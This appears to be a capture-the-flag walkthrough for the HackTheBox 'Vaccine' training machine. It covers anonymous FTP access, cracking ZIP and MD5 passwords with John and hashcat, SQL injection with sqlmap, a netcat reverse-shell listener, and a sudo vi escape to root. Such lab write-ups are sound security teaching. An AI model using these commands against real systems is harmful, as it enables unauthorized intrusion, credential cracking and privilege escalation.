HackTheBox: Vaccine Room
Vaccine is an Easy-level machine on the HackTheBox platform, designed to introduce participants to the basics of web application security, exploitation, and privilege escalation. It is an excellent starting point for beginners who want to improve their penetration testing skills and understand common web vulnerabilities in a controlled environment.
Objectives
The main objectives of the Vaccine room are:
1. Identify and exploit vulnerabilities in a web application.
2. Gain initial foothold through web exploitation techniques.
3. Escalate privileges to root access by analyzing misconfigurations or vulnerabilities in the system.
Tools and Techniques
Participants may use a variety of tools to complete this room, including:
- Reconnaissance tools: nmap, gobuster, dirb.
- Exploitation tools: Burp Suite, Metasploit (if needed), or manual payload crafting.
- Post-exploitation tools: linpeas, pspy, or custom scripts for local privilege escalation.
Following techniques will be required:
- Web application vulnerability analysis.
- Exploiting common misconfigurations.
- Utilizing tools for enumeration and exploitation.
- Privilege escalation techniques.
Walkthrough
Reconnaissance & Enumeration
The first step involves scanning the target machine with nmap (nmap -sV -p <Target IP>):
Open ports: FTP (21), SSH (22), and HTTP (80).
FTP: Configured to allow anonymous login.
HTTP: Running Apache HTTPD.
By identifying open services, we determine possible attack vectors.
Exploitation
Using the FTP service with the anonymous login, we retrieve a file named backup.zip.
ftp <target-ip>
Username: anonymous
Password: (any)
ftp> get backup.zip
The ZIP file is password-protected. We use zip2john to generate a hash and John the Ripper to crack it.
Convert the ZIP to a crackable hash:
zip2john backup.zip > backup.hash
Crack the hash using rockyou.txt:
john backup.hash --wordlist=/usr/share/wordlists/rockyou.txt
Password found: 741852963
Extract files:
unzip backup.zip
Inside the ZIP, we find a PHP file (index.php). Analyzing its code reveals an MD5 hash used for login validation.
if ($username === "admin" && md5($password) === "<md5_hash>")
We use Hashcat or online tools like CrackStation to crack the hash.
hashcat -m 0 <md5_hash> /usr/share/wordlists/rockyou.txt
Password found: qwerty789
The web application is vulnerable to SQL injection. Testing with a single quote (') returns an error, confirming the vulnerability. Using SQLMap, we automate the exploitation:
sqlmap -u "http://vaccine.htb/?search=" --dbs
Outcome: Identified databases and extracted data.
Post-Exploitation
Create a reverse shell payload using tools like [revshells.com].
Inject the payload into the SQL query or upload it via file inclusion.
Set up a listener:
nc -nlvp 1337
Execute the payload and gain shell access.
Privilege Escalation
Search for misconfigurations and sensitive files, for example SUID binaries:
find / -perm -4000 -type f 2>/dev/null
Analyze sudo permissions:
sudo -l
Key finding: The vi binary can be run with sudo.
Refer to [GTFOBins] for escape techniques.
Launch vi as sudo:
sudo vi
Escape to a root shell:
:! /bin/bash
Verify root access and retrieve the flag:
whoami
cat /root/root.txt
Conclusion
The Vaccine machine demonstrates essential techniques for penetration testing:
- Service enumeration.
- Password cracking with John the Ripper.
- SQL injection exploitation with SQLMap.
- Privilege escalation using sudo misconfigurations and GTFOBins.
These skills are foundational for understanding system vulnerabilities and exploitation methods.